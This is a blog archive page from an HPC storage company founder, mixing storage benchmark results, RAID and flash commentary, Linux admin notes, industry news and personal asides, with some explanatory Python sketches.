I say I am not surprised by their reasoning … not that I had an inkling that they would do this beforehand. Basically they pulled the plug because the costs were growing far faster than they planned, and they couldn’t afford to deliver the machine at the requested price. Which makes perfect sense to a business that has to consider profit and loss, but maybe not so much sense to research groups that want things.
Posts
Ever have one of them moments ...
… where you look at a technology and think to yourself … I need this. Just had that looking over MongoDB. I’ve spent the better part of a couple of weeks working on implementing a very poor man’s version of this atop SQLite for one of our tools. And along comes MongoDB, and they solve exactly the problem I was trying to solve. So, we are going to start implementing it on our units.
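Here is a hypothetical Python sketch of what a "very poor man's" document store atop SQLite might look like. The class and method names are invented for illustration and are not taken from our tools. JSON documents go into a single table, and queries are answered by a full scan in Python. There are no indexes on document fields, and MongoDB supports those out of the box.

```python
import json
import sqlite3


class TinyDocStore:
    """Hypothetical poor man's document store: JSON blobs in one SQLite table."""

    def __init__(self, path: str = ":memory:"):
        self.conn = sqlite3.connect(path)
        self.conn.execute(
            "CREATE TABLE IF NOT EXISTS docs (id INTEGER PRIMARY KEY, body TEXT NOT NULL)"
        )

    def insert(self, doc: dict) -> int:
        """Serialize the document to JSON and return its new row id."""
        cur = self.conn.execute("INSERT INTO docs (body) VALUES (?)", (json.dumps(doc),))
        self.conn.commit()
        return cur.lastrowid

    def find(self, **criteria) -> list:
        """Full table scan: keep documents whose top-level fields equal every criterion."""
        results = []
        for (body,) in self.conn.execute("SELECT body FROM docs ORDER BY id"):
            doc = json.loads(body)
            if all(doc.get(k) == v for k, v in criteria.items()):
                results.append(doc)
        return results


store = TinyDocStore()
store.insert({"host": "jr4-1", "role": "storage", "disks": 48})
store.insert({"host": "jr4-2", "role": "storage", "disks": 24})
store.insert({"host": "head0", "role": "login"})
print([d["host"] for d in store.find(role="storage")])  # ['jr4-1', 'jr4-2']
```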
Posts
Rethinking RAID for SSDs
SSD units are fast, well, depending upon design, controller and other things. Sandforce units use a compression and overprovision technology to reduce write amplification. SSD units do writes, optimally, in erase block sizes. This suggests that your RAID chunk size should be a multiple of the erase block size. This is a good thing. The issue is that if you have a hardware RAID controller, you might think that the optimal way to handle this is to build a RAID5 or RAID6 atop this SSD pool.
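The Python sketch below illustrates the alignment argument. It checks whether a RAID chunk size is a whole multiple of the erase block, and it computes the full-stripe width. The 512 KiB erase block and the 8-drive RAID6 layout are hypothetical. Real erase block sizes vary by device and are often not published. With RAID5/6, any write smaller than a full stripe forces a read-modify-write of parity. On SSDs that means extra writes on top of the controller's own write amplification.

```python
def chunk_is_aligned(chunk_kib: int, erase_block_kib: int) -> bool:
    """True if the RAID chunk is a whole multiple of the SSD erase block."""
    return chunk_kib % erase_block_kib == 0


def full_stripe_kib(chunk_kib: int, n_drives: int, parity_drives: int) -> int:
    """Data carried by one full stripe: chunk size times the number of data drives."""
    return chunk_kib * (n_drives - parity_drives)


# Hypothetical geometry: 512 KiB erase blocks, 8-drive RAID6 (2 parity drives).
erase = 512
for chunk in (64, 512, 1024):
    print(chunk, chunk_is_aligned(chunk, erase), full_stripe_kib(chunk, 8, 2))
```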
Posts
OT: and on a happy personal note ...
… both my daughter and I were promoted to yon-kyu (green belt) in Isshinryu. Took me longer than I liked, but the specific kata we were learning was complex. Ok, it looks simple, but … it really … really … isn’t. There is great subtlety in it. Mastering this takes a while. The moves took me about a month. The rest took me much longer. Here is one of the style’s leadership (10th Dan) showing how to do this
Posts
PCIe Flash: Yeah, I think its here to stay
I’ve had some concerns over the business model for this. The price per GB is way … way out there for SLC. The use case for SLC vs MLC (especially with eMLC coming on line) is very similar. The cost of MLC is making these units affordable, and even worth considering for people. There seem to be a consumer/hobbyist version and a professional class. The former has a bad performance rap from the first set of products.
Posts
Many happenings in HPC ...
I’ve been mostly heads down for the last month, very little time to work on posts. This is a good thing, as this has been mostly (new) business bits. We’ve got a range of new products we’ve been working on to address specific market segments, and have a number of nice new wins in a market segment we’ve been working on for a while. Working on more of course, and our core markets.
Posts
OT: This juxtaposition on Drudge ... I'm sure it was an accident ...
It’s a Friday, I’ve had a tough week (caught pneumonia on the way home from NY, been recovering all this time). Hopefully this isn’t the meds talking below … Every now and then, there is inadvertent and unintentional humor in news. Well, the juxtapositions are humorous, even if the events are terrible. Think …. causality … below …
Obviously, violence isn’t a laughing matter. But that juxtaposition … with Jersey Shore immediately above it … doesn’t quite suggest it was … or wasn’t!
Posts
... and the day job turned 9 ...
… on Monday … Woo Hoo!!! What hasn’t killed us, has made us stronger … Or something like that. More correctly, the company was born 1-August-2002. Growing since inception. About to grow some more. No venture backing. During this time, we’ve worked on trying to convince people that accelerators would be important to HPC, back in 2004 time frame or so. Tried to raise capital, built business plans, got most of the details right.
Posts
Benchies: figuring out how to tune this thing ...
Design is good, but it looks like we are rate limited on the PCIe gen 2. 128GB read from a single name space. 8 simultaneous threads.
Run status group 0 (all jobs): READ: io=126984MB, aggrb=5285.8MB/s, minb=5412.6MB/s, maxb=5412.6MB/s, mint=24024msec, maxt=24024msec
Yes, that is 5.3 GB/s. Still far south of what we can be doing, but I’ve verified with other tests that we are rate limited to ~2GB/s per RAID. This looks like a card issue.
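The theoretical PCIe 2.0 ceiling gives a sense of scale. Each lane signals at 5 GT/s, and 8b/10b encoding carries 8 data bits for every 10 transferred. That works out to 500 MB/s per lane in each direction. The post doesn't say how wide the card's link is, so the Python sketch below just tabulates common widths. Packet and protocol overhead push real throughput below these figures.

```python
def pcie_gen2_mb_s(lanes: int) -> float:
    """Per-direction PCIe 2.0 payload ceiling in MB/s (10^6 bytes), before protocol overhead.

    Each lane signals at 5 GT/s; 8b/10b encoding leaves 8 data bits per 10 transferred bits.
    """
    transfers_per_s = 5e9
    data_bits_per_s = transfers_per_s * 8 / 10
    return lanes * data_bits_per_s / 8 / 1e6


for lanes in (4, 8, 16):
    print(f"x{lanes}: {pcie_gen2_mb_s(lanes):.0f} MB/s")
```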
Posts
Giddy ...
Benchies soon. Real soon. Should be a screamer … if we designed/built it right.
Posts
HPC in the cloud and cluster distributions
Many things are moving to cloud hosting … I won’t comment on being right or wrong about their moving … and HPC is one of them. This means that cluster distributions are going to follow … or could follow to some degree. Some cluster distributions focus upon packaging, some focus upon flexibility, some focus upon GUIs. All try to integrate some subset of needed tools. But all were effectively designed for a cluster computing model where some of the key/critical assumptions at the base of the distribution are simply not the case in the cloud, and due to the way they work, can’t easily be worked around.
Posts
Many reasons for not posting in the last two weeks
None of them bad. Too much work to get through (yes, that does mean new/existing orders). A vacation (long overdue, and yes, I was working though it as well). Back now … will be catching up soon with a set of posts in the next few days.
Posts
Color me amused ...
Every now and then recruiters call me. Want to see if I want the glamour of some new position somewhere. I run a very nice little, and growing company. I own a substantial fraction of this company. Our revenues are far more than the recruiter’s company is likely willing to pay. There are too many digits in our revenues, before the decimal point, relative to any likely salary. I am working extremely hard at increasing the number of digits.
Posts
Storm knocked out power for a while ...
Detroit Edison worked on it and got our office power up in 24 hours. Our house (where this server is located) … not so happy. Didn’t come back on until afternoon today. That was fun. [update] … and all the updating I’ve done has managed to bork the views counter. So it’s gonna look like we don’t get lots of traffic here. Will see if I can reconstruct this, but it’s a low priority item.
Posts
Scanning backing store for a cluster file system
Working on solving an issue for a customer. Wrote a backing store scanning tool for the job. It’s gathering all manner of information and computing md5 sums. Right now it is single threaded, and as I watch it run, it seems like I am using about 1/2 of the IO bandwidth (2 scans going at once on a machine). Will look at getting the scans going in parallel. Shouldn’t be hard (embarrassingly parallel problem).
Posts
Project relampago: coming to siClusters, JackRabbits, and DeltaV's near you ...
We’ve been working on some things, quietly, for a while. Almost … almost ready to talk about this. Should have something to show at SC11 this year certainly. Working on tuning. Maybe a character flaw on my part, but I am never happy with performance. More soon. I promise … (and yeah, been insanely busy, again).
Posts
Note to self: use the sparse switch when moving data around with tar
Using a tar pair to move data between two systems, over an NFS link. This is faster than over ssh (ssh isn’t a fast transport layer). Some user wrote a sparse file out. An 11PB sparse file. Which the tar happily … happily I tell you !!! was trying to copy, in its entirety, over to the backup unit. Happily. Took me a quick look to see what was going on.
Posts
Transformers ... shot in Michigan
This was nice. The original movie in the series was shot in downtown Detroit. Or at least the scenes towards the end (when they are duking it out in the city). It was funny to see the old railroad terminal building being used as a chase scene. FWIW, that building would make one helluva nice data center. Just needs to be cleaned up, with lots of AC/power added. Right next to a railroad right of way.
Posts
You win some, and you lose some
Just found out the day job lost a major storage upgrade to a competitor. Read over the evaluations, and we had some questions, sent them off to the purchasing folks. Its always annoying to lose. But from losing you can gain knowledge of why you lost and hone your offerings or your bidding … well … most of the time you can. Sometimes, the process is engineered for a particular outcome, due to an effective manipulation of rankings.
Posts
Updated DeltaV benchmarks, and a limited time discount offer
Somewhat better tuning on this unit now. This is getting … interesting. Very interesting. As a reminder, the day job’s lower cost storage target, the DeltaV, is designed specifically to be a lower end machine. It is fast, and as we saw on the last set of numbers, it is actually faster than competitors’ hardware RAID. DeltaV does the RAID bits in software. So this is another (identical) unit to the one we tested before.
Posts
There is a clear and present need for meaningful metrics for HPC and storage
As the discussion of the amazing performance of the K machine continues, one needs to ask how well correlated the numbers are against end user realizable and likely performance. That is, how useful is top500 as an actual predictor of system performance for a particular task? Same question of Graph500, SPEC*, etc. ? How useful is Green500 at predicting power utilization and likely throughput of a specific design? Basically, I am not trying to minimize the efforts put into these.
Posts
OT: Fun week ahead
This is a personal bit. I am going up for belt promotion in Karate this Thursday. Huge risk saying something in advance in case I don’t make it. I am not worried about most of it. The fighting portion, yeah, a bit. I’m fine in sparring bouts, but this promises to be at least 7 fresh opponents, one after the other, with no rest for me. 2 minutes each opponent, and they run them from low to higher rank (the opponents get tougher at the end).
Posts
"K" is atop the top500. What does this mean to us?
Not much. No, I am not trying to be a downer. The relation of the top500 top-o-the-heap to mere mortals with hard problems to solve isn’t very strong. Actually it’s quite weak. There is only one K machine. It’s at RIKEN in Japan. There’s only one Jaguar, and only one Tianhe machine. All are, to some degree or the other, unique in some aspects. What matters to most people is “what can it do for me”?
Posts
Updated DeltaV in the lab
Should be a pretty good performance bump for the unit. Processor and memory bump. Newer backplane. Some other bits. Will update soon. Really looking forward to the benchies :) [Update 1] Very encouraging sign: RAID build is occurring at about 2x the rate of the previous generation. Should be done with 48TB RAID build in about 7 more hours. The comparison to the hardware accelerated RAID should be made as well.
Posts
One of the best compilers out there goes open source
Pathscale makes some of the best C/C++/Fortran compilers on the market. And now, they are open source. Grab the bits while they are hot!
Posts
Shakes head ...
Them: Here is our parts list. We found it by going to these web sites (see long list) finding the lowest cost among them, and then adding it in to the spec. Me: Uh huh (noting the several conflicting and wrong elements). So what is it you are trying to do … Them: Never mind that, this is our new machine, and it will do X … [n.b. X is some magical realization of performance at the 99th percentile of the system’s capability … only would hit that if everything, and I mean EVERYTHING, was perfect.
Posts
Fusion IO IPO tomorrow ... is the market for PCIe Flash strong enough to support 1 or more companies?
FusionIO goes public tomorrow. If you are an early employee, chances are, you are going to be a millionaire by the end of the day, at least on paper. The author of the great “fio” tool works there, and I hope this does work out for him and the rest of them well. But … my question is a longer term one. Does the market … or will the market … support a higher cost PCIe channel flash as opposed to lower cost SSD based units?
Posts
How to channel bond in Linux
Partner wants a 4 way bond on their unit. No problem.
[root@jr4-1 ~]# /opt/scalable/sbin/mkchbond.pl --bond=bond0 --eth=eth0,eth1,eth2,eth3 --ip=10.100.243.80 --netmask=255.255.0.0 --mode=0 --write mkchbond.pl: v0.9 Create channel bonds easily by Joe Landman (http://scalableinformatics.com) This software is Copyright (c) 2005-2007 by Scalable Informatics and licensed under GPL v2.0 only. You may freely distribute this software under the terms and conditions of the GPL 2.0 license. You may not alter, remove, or prevent printing of the copyright notice and information.
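For readers without that script, here is a hedged Python sketch of the configuration a 4-way bond typically becomes on a RHEL/CentOS system that uses network-scripts `ifcfg` files. This layout is an assumption and is not the output of `mkchbond.pl`. The `miimon=100` link-monitoring interval is an illustrative default. `mode=0` is the bonding driver's balance-rr mode, which generally needs matching static link aggregation configured on the switch.

```python
def bond_ifcfg(bond: str, slaves, ip: str, netmask: str, mode: int = 0, miimon: int = 100) -> dict:
    """Render ifcfg file contents for a bond and its slave NICs.

    Returns {filename: contents}; nothing is written to disk.
    """
    files = {
        f"ifcfg-{bond}": "\n".join([
            f"DEVICE={bond}",
            "BOOTPROTO=none",
            "ONBOOT=yes",
            f"IPADDR={ip}",
            f"NETMASK={netmask}",
            f'BONDING_OPTS="mode={mode} miimon={miimon}"',
        ]) + "\n"
    }
    for nic in slaves:
        # Each physical NIC is enslaved to the bond and carries no address itself.
        files[f"ifcfg-{nic}"] = "\n".join([
            f"DEVICE={nic}",
            "BOOTPROTO=none",
            "ONBOOT=yes",
            f"MASTER={bond}",
            "SLAVE=yes",
        ]) + "\n"
    return files


# Same parameters as the mkchbond.pl invocation above.
for name, text in bond_ifcfg("bond0", ["eth0", "eth1", "eth2", "eth3"],
                             "10.100.243.80", "255.255.0.0").items():
    print(f"# /etc/sysconfig/network-scripts/{name}\n{text}")
```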
Posts
Disappointed, but, I guess, not surprised
Several years ago, we had an academic customer literally steal our time, our effort, our design, etc. for their system. The signals were there, and we didn’t pay attention to them. Something like that happened again, though this time we recognized it. Customer still is operating off the assumption that they got something for nothing, but … well … when they put their system together, discover that it doesn’t work, I expect a few probing emails.
Posts
Why do companies erect unneeded barriers?
This is about the business side, and AMEX in particular. A customer bought something. Paid for it on AMEX. We use Authorize.Net, as do many people. It handles the card processing for us. Makes our life easy. But it doesn’t do AMEX directly, AMEX does AMEX. And they don’t play well with Authorize.Net. So now we are in the position of having to decline this AMEX transaction, and remove AMEX from our accepted card list, because AMEX is more interested in wasting my time and erecting barriers to doing business, than actually doing business.
Posts
What are xfs's real limits?
Over at Enterprise Storage Forum, Henry Newman and Jeff Layton started a conversation that needs to be shared. This is a very good article. In it, they reproduced a table comparing file systems coming from this page at Redhat. This is really showing a comparison of what the “limits” are in a theoretical or practical sense between the various versions of RHEL platforms. The file system table compares what you can do in each version.
Posts
Working on a few new things ...
Ok, some of these are riffs on our older things, but they are very exciting to everyone we speak with. Need a chassis mod for one of them. The other is … well … an extension of an earlier idea. Been doing some testing with it, and it’s working out far better than I had thought. Sorry for being so vague. I don’t want to let these cats out of the bag … yet
Posts
OT: been very busy ...
Good version of busy; lots of quotes, orders, builds, …. A new market has emerged for us, one I wasn’t sure how to break into, that looks like it is going to do good things for us. Entrenched expensive and slow competitor, everyone looking for better systems. Should be interesting coupla months. I hope I get time for a vacation in there somewhere.
Posts
OT: Just played with Google Docs ...
Wow … uploaded a presentation I was working on for a customer and it worked well. Rendered everything correctly (OpenOffice doesn’t always do that). Anyone else using Google Docs on a more or less professional/constant basis? Any outage issues? Compatibility issues? I like OpenOffice, but its occasional glitches and … er … interpretive re-renderings of Powerpoints are … er … amusing. The downsides to Google Docs are offsite storage, privacy/security issues, and access in the event of a network outage.
Posts
OT: heh ... nice to see people resuming a healthy skepticism
See here . money quote
My gosh … a follow the money mystery? Who woulda thunk it? At any rate, it’s good to see people resume the healthy skepticism that is needed for real scientific inquiry and advancement. Science is never settled, and anyone telling you otherwise is trying to sell you something. Sure enough, some of those doing the selling have a strong economic incentive for doing so. Go figure.
Posts
... and Sandisk swallows Pliant ...
This is interesting. SanDisk now has an enterprise play. Flash is getting more interesting. Basically creating the same sort of sea change in storage that GPUs created in computing.
Posts
Still struggling with half-open and otherwise broken drivers
We have a nice pair of Qlogic 7220 DDR HCAs in house. Direct connecting a pair of machines for a simple point to point bit. Using our updated 2.6.32.39.scalable kernel. Want to set up SRP target. So we have to get OFED compiled. Need 1.5.3+ due to their … er … issues tracking kernels. Basically the OFED build process is an abuse … a very severe one … of the RPM process.
Posts
Updated JackRabbit JR5 results
Lab machine, updated RAID system (to our current shipping specs). We’ve got a 10GbE and an IB DDR card in there for some end user lab tests over the next 2 weeks. We just finished rebuilding the RAID unit, and I wanted a baseline measurement. So a fast write then read (uncached of course).
[root@jr5-lab fio]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=195864MB, aggrb=3789.1MB/s, minb=3880.1MB/s, maxb=3880.1MB/s, mint=51680msec, maxt=51680msec
That’s the write.
Posts
IT storage
They see a shiny new storage chassis with 6G backplane. They fill it with “fast” drives, and build “raids” using integrated RAID platforms. They insist it should be fast, showing calculations that suggest that it should sustain near theoretical max performance on IO. Yet, the reality is that it’s 1/10th to 1/20th the theoretical max performance. What’s going on? In the past, I’ve railed against “IT clusters” … basically clusters designed, built, and operated by IT staff unfamiliar with how HPC systems worked.
Posts
Unbelievable
A system designed to fail often will. Seen this a few times this past week. In one case, someone agrees that what we do and our machines have value, but wants our stuff without paying us for our stuff. They don’t want to buy them. They just want us to tell them how to build them. They don’t want to buy our stuff, even though we’ve demonstrated that our systems solve their problem.
Posts
Interesting acquisition: STEC takes KQ Infotech (assets)
I wasn’t expecting this one. KQ Infotech is a smaller development house probably best known for their porting of ZFS to Linux, and providing the tools required for end users to build their own ZFS on their own machines (thus getting around some of the major hurdles with GPL and CDDL licenses). I was not expecting this, though to be honest, we’ve seen some pretty interesting M&A bits over the last 2-4 weeks.
Posts
Ok, this is just showing off now ...
One of the two units we are going to ship to a customer very soon. Running the 19.2TB write. Fill up 1/2 the system. With a single file. Of 19.2TB size. In less than 2 hours. Don’t try this on ext*.
[root@jr5-1 ~]# fio sw-19.2TB.fio ... Run status group 0 (all jobs): WRITE: io=19200GB, aggrb=3160.7MB/s, minb=3235.1MB/s, maxb=3235.1MB/s, mint=6221566msec, maxt=6221566msec [root@jr5-1 ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/md0 44G 5.
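The "less than 2 hours" claim can be checked from the fio line by dividing the data written by the aggregate rate. The Python sketch below assumes that fio's `GB` and `MB` here are 1024-based units. It lands at about 6220 s, roughly 1.73 hours, which matches fio's own reported runtime of 6221566 msec.

```python
def fill_time_s(total_gib: float, rate_mib_s: float) -> float:
    """Seconds to write total_gib gibibytes at a sustained rate_mib_s."""
    return total_gib * 1024 / rate_mib_s


# io=19200GB at aggrb=3160.7MB/s, copied from the fio summary above.
t = fill_time_s(19200, 3160.7)
print(f"{t:.0f} s = {t / 3600:.2f} h")
```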
Posts
Raw, unapologetic, firepower
96TB Scalable Informatics JackRabbit JR5 unit, shipping out to a customer today (or early tomorrow). These are single thread, single process, single file writes. Taking it out to the track and cracking the throttle, wide open.
[root@jr5-2 ~]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=65028MB, aggrb=3801.1MB/s, minb=3893.2MB/s, maxb=3893.2MB/s, mint=17104msec, maxt=17104msec [root@jr5-2 ~]# fio sr.fio ... Run status group 0 (all jobs): READ: io=65028MB, aggrb=3257.2MB/s, minb=3335.3MB/s, maxb=3335.3MB/s, mint=19965msec, maxt=19965msec and the 1TB run
Posts
... and Seagate snarfs up Samsung's drive business ...
Looks like Seagate got itself some spinpoints. Seagate may be leveraging this to push further into the Chinese market than it already is. Now there are 3 big spinning rust makers: Seagate, Western Digital, and Toshiba. A Seagate-Toshiba hookup wouldn’t surprise me, though the regulators are likely to start eyeing this stuff more closely for anti-monopoly reasons. I’ve said more M&A, and I meant more M&A. And the deals ain’t done yet.
Posts
Ignore the spork behind the curtain ...
At InsideHPC, Rich notes in a post
Heh … I’d argue that the (sp)fork already happened, it’s in the past, and people have decided to continue moving forward with the new (sp)fork. That said, this is decidedly not a bad thing. As I had predicted, Oracle has largely abandoned all things HPC that it couldn’t re-mission for some other decidedly non-HPC purpose. The only realistic reason for retaining ownership of the Lustre IP/copyrights/etc.
Posts
file system surgery on borked Lustre volumes
So whatcha gonna do when you have a Lustre file system, with an ext4 backing store with a journal on an external RAID1 SSD, when that external RAID1 SSD pair goes away (in a non-recoverable manner), and the file system has the needs_recovery flag set? You see, the ‘-f’ option to e2fsck … doesn’t … in the face of a missing external journal with needs_recovery set. Ok, you can turn off the journal.
Posts
On the broken-ness of most Linux distributions ...
If you have anything approaching a complex installation or management requirement for your systems, most … no … pretty much all Linux distributions have anywhere from somewhat borked to completely boneheaded designs for handling these complex situations. Say, for example, you want to boot a diskless NFS system, and replicate it. Diskless NFS is well known to be an easy to manage scenario … one system to manage, very scalable from an admin point of view.
Posts
At NAB in Las Vegas ... in a word ... wow!!!
I’ve got a much longer writeup in mind. Those who attend SCxx and think it’s big … er … no. Conservative guess: NAB is 5x the size of SCxx in terms of exhibit floor space. This may be an underestimate by 2-4x; BTW, I’ve only visited the upper and lower south exhibit hall areas, not the central or north exhibit halls. And, to add insult to injury … the entire SCxx floor would fit in 1/2 of one of the upper or lower floor levels.
Posts
Another test case on a 5U JackRabbit
This is the other 5U JackRabbit unit we are building for the customer. Single thread read of a large file, no caching. This is spinning rust (i.e. hard disk). This uses 2TB drives while the other unit uses 1TB drives. The theoretical maximum we could pull data off these units, the way they are arranged now, is 4.68 GB/s with these particular drives.
[root@jr5-2 ~]# dd of=/dev/null if=/data/big.file ... 1024+0 records in 1024+0 records out 137438953472 bytes (137 GB) copied, 29.
Posts
Not all clouds have silver linings ...
AaaS/StaaS (Archive as a service, Storage as a service) seems to have providers dropping their offerings as they are not very profitable. As with computing as a service, the issues are costs, pure and simple. For this to work well as a service, you, the provider, need your costs to be well below what you charge your customers. Moreover, the cost you charge your customers needs to be below their entire burdened costs for replicating the same thing in house.
Posts
The TB sprint ... 12.4 TB/hour write speed
We wanted to see what one of the current gen machines could do for writing and reading a 1TB (1000GB) sized file. So we set up a simple fio deck to do this. Then ran it.
Run status group 0 (all jobs): WRITE: io=999.78GB, aggrb=3535.7MB/s, minb=3620.6MB/s, maxb=3620.6MB/s, mint=289552msec, maxt=289552msec The write took 289.6 seconds. Less than 5 minutes, or 12.4 TB/hour write speed. The read
Run status group 0 (all jobs): READ: io=999.
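The TB/hour figure is simple arithmetic on the fio summary. A small Python sketch of it, keeping the post’s convention that 1 TB is 1000 of the GB fio reports; since fio’s default unit base is 1024, a strict SI (10^12 byte) figure would come out somewhat higher. The function name is illustrative.

```python
def sprint_rate(io_gb: float, runtime_ms: int) -> tuple[float, float]:
    """Return (runtime in seconds, TB per hour), with 1 TB = 1000 GB as reported by fio."""
    seconds = runtime_ms / 1000.0
    gb_per_second = io_gb / seconds
    tb_per_hour = gb_per_second * 3600.0 / 1000.0
    return seconds, tb_per_hour


# Numbers from the 1TB write run: io=999.78GB, maxt=289552msec
seconds, rate = sprint_rate(999.78, 289552)
print(f"{seconds:.1f} s, {rate:.1f} TB/hour")  # 289.6 s, 12.4 TB/hour
```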
Posts
Now that's what I'm talking about ...
New JackRabbit JR5 in lab (actually a pair of them) being built for a customer. Running some real simple baseline tests. Very simple stuff. RAID6. dd.
[root@jr5-1 ~]# dd if=/dev/zero of=/data/big.file ... 1250+0 records in 1250+0 records out 83886080000 bytes (84 GB) copied, 26.4774 seconds, 3.2 GB/s and a quick-and-dirty fio run …
Run status group 0 (all jobs): WRITE: io=128004MB, aggrb=3336.4MB/s, minb=3416.4MB/s, maxb=3416.4MB/s, mint=38367msec, maxt=38367msec and the read version
Posts
Day job at 2011 High Performance Computing Linux Financial Markets on Monday 4-April
We will be there, with 2 machines in a booth with our partner JRTI/XCT. We are featuring Flash hardware from Virident and showing a demo (or set of demos) on very high performance data analysis using kdb+. Scalable gear will include a JackRabbit JR4 unit with 2x Virident TachIOn cards (think drool-worthy 1GB/s 300k IOP cards … ). Everything in the JR4 is new, apart from the disks … which are older/slower (what we had on hand).
Posts
Pot ... kettle ... yeah, something like this
I think this news story is a day early. It has all the requisite gems in it.
My gosh, for a moment, I thought Microsoft was talking about itself in the PC market. Then I saw the words “Google” and “e-book”. Now if we changed those to “Microsoft” and “PC”, yeah, that statement would also be true. Are we sure this isn’t the first of April?
Posts
Something we are working on
Ignore some of the ugly table bits to the left. Still working on the screen layout, menu look/feel, etc. But you can get a sense of what we are doing. This will appear at the HPC Linux on Wall Street show with us next week, as we will be running demos from this (and showing to a few prospective partners/customers at NAB in Las Vegas). Please feel free to stop by if you are in NYC for the show … Many of the functions are not fully hooked to the controllers yet, but you will get the idea.
Posts
Hilarious startup robot pitches a VC ...
As seen on InsideHPC in a post
Ok … a long time ago I posted a somewhat silly post, briefly lampooning the VCs’ penchant for crowd-funding ideas that were buzzword heavy (and, ahem … value-lite … ahem), whilst ignoring real innovation, real markets, real companies. This video does a similar type of lampooning, and it is, sadly, on the money. If we were pitching the day job as a “Social network, and crowd source content and media data repository” rather than as a “high performance storage and computing solutions” company … yeah … chances are we’d get much more interest from that community.
Posts
Oracle dumps Itanic
You can sort of see this coming. Oracle is ditching Itanium development, effective immediately. If they haven’t done so for Power … yet … I’d expect this soon as well. Oracle’s claim is that Intel is ditching Itanium. Well, yeah, it’s sort of a weak argument. The future of Intel isn’t much on the Itanium side of things. x86 and derivatives appear to be their future, but Itanium isn’t being deep-sixed now.
Posts
Parts shortages
We’ve noticed this over the past week. Have a number of new orders, and suddenly, memory is hard to find. And prices have jumped dramatically. From /.
We do just-in-time builds, so we tend to keep inventory down. Global supply and demand, folks; the economy is operating as it should. When you have shortages, pricing rises through the channel to market. There is little we can do about this. We have some memory supply (the parts giving us issues now), and CPUs aren’t a problem.
Posts
OT: Darned caffeine containment leak ...
on my desk. Quick thinking Doug managed to help me avoid a tragedy of epic proportions (completely covering my desk with coffee) by application of the caffeine leak containment device (e.g. towel). No pictures of this tragedy, and it was unrelated to any earthquakes. It was related to the klutz whose left hand was near the coffee and moved it like this … DO’H!
Posts
What should 432TB of storage cost?
This is close to 1/2 PB. Assume you are building a very fast storage unit and backup system. What should this cost? Yeah, we can argue about cost per GB/s and cost per IOP/s. Assume 3GB/s, and 10k IOPs. Assume the unit is 144TB raw (108TB usable) primary fast storage, and 288TB raw (216TB usable) backup storage. There is a poll for this post, but you have to click the title to be able to participate.
Posts
Day job PR on a new accelerated cluster at Stanford
See InsideHPC for the scoop. PRWeb stuff here. Will have it up on our site soon. This uses the XCT chassis, which lets us use C20x0 Fermi, as well as other PCIe cards (can you say Virident Flash? ) The system will be using Bright Computing’s excellent Cluster Management tool. We will take pictures/movies during assembly and installation. Should be fun! About 15TF, 100x Fermi units, 96TB storage. Excellent design overall (pats himself on the back), and a major win for our partner JRTI and us, validating our strategic partnership.
Posts
Not good
The earthquake, tsunami and its aftereffects are terrible enough. Our thoughts are with the people of Japan (we have quite a few readers there). The US Red Cross is set up to take donations for relief work there if you are inclined to go that route. If you are in Japan, and have alternative suggestions as to how we all can help, please do post them. One of the aftereffects of this event was a destabilization of a boiling water reactor.
Posts
Deskside box with lotsa GPUs
Testing this for a partner. A Pegasus deskside supercomputer with 12x X5690 CPU cores, 48 GB RAM, 500 MB/s IO channel (soon to 1 GB/s), and a GTX 260 graphics card. Connected to an XCT a-Brix 2U unit with 4x NVidia Fermi C2050’s (normally we’d use a JackRabbit unit, but they are all busy with customer projects right now). First, let’s see what’s there:
[root@pegasus C]# lspci | grep nVidia | grep VGA 06:00.
Posts
... and NetApp buys Engenio ...
[updated] Ok, this one is huge. Many of the higher end storage folks in the HPC world use this hardware. Which NetApp will now own. NetApp is not an HPC storage vendor, and I don’t think they have designs to be one [update] yes they do! But this goes to Cray, SGI, Oracle, Dell, IBM, HP, and many others (DDN, Bluearc, Terascala, etc.) who do use Engenio. We don’t use it, so it’s really not an issue to us.
Posts
when failures stick out like a statistical sore thumb
Parts fail. Components fail. You have to operate assuming they will fail. A warranty is fundamentally a bet that parts will fail, and a willingness to place money (the price of the warranty) on that bet. Over time, with enough components, you get a feel for how often parts fail. You get historical data. When one subset of components has a high failure rate (e.g. Corsair SSD disks), you know you can isolate the problem.
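One simple way to put a number on “sticks out” is a binomial tail: if the suspect subset failed at the same rate as everything else, how likely is the observed failure count? A Python sketch with hypothetical numbers. It assumes failures are independent and share one fleet-wide rate, which is a simplification, and it is a generic statistical test, not the process described in the post.

```python
from math import comb


def binomial_tail(k: int, n: int, p: float) -> float:
    """P(X >= k) for X ~ Binomial(n, p): the chance of k or more failures by luck alone."""
    return sum(comb(n, i) * p**i * (1 - p) ** (n - i) for i in range(k, n + 1))


# Hypothetical numbers, for illustration only:
# fleet-wide failure rate of 2% over the period, and one product line
# with 8 failures out of 50 units in service.
fleet_rate = 0.02
p_value = binomial_tail(8, 50, fleet_rate)
print(f"expected failures: {50 * fleet_rate:.1f}, P(>= 8 by chance) = {p_value:.2e}")
```

If the subset behaved like the rest of the fleet, about one failure would be expected; a tail probability of a few in a million says that subset is sticking out.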
Posts
Single vs Multi-stream on JackRabbit JR5
A customer was playing with one of our lab machines (a JackRabbit JR5), and asked us if we could improve the multithread streaming performance. The way we had it set up (for internal testing) was non-optimal for their use case. So we went back and did some simple tweaks. Somewhat better optimized for their use case. Remember, this is our previous generation unit. Next gen is … a little faster :)
Posts
... and Hitachi GST is eaten by ... WD ...
Hitachi, whose drives we do like, was just eaten by WD, whose drives we run away from. Story here. As long as the product lines that get ditched are the WD’s in favor of the Hitachi’s, I am ok with this. 2TB drives that decide to randomly power down in a RAID, without informing anyone? And a company that seems to want us all to believe that there are no firmware updates?
Posts
BTW: had an iPhone-ish meltdown
took all my contact data with it … so … if you happen to want me to contact you, gotta give me some numbers to reach you at. Private email me at joe@scalability.org and I’ll re-enter it (and store it somewhere else). Yeah, mobile device backup? Pretty darned important? Me? A fool for not doing this regularly.
Posts
I can't believe I forgot to update this
Day job storage units have increased density. JackRabbit JR2 tops out at 36TB now, JackRabbit JR3 tops out at 48TB, JackRabbit JR4 tops out at 72TB, and JackRabbit JR5 tops out at 144TB. 8 of the latter can go into a 42U rack, and get you 1.1PB of insanely fast storage. Our measured bandwidths are also quite good. JR4’s are demonstrating sustained 2+GB/s. JR5’s … well :) DeltaV units of similar size specs.
Posts
Quick accounting tool for Torque
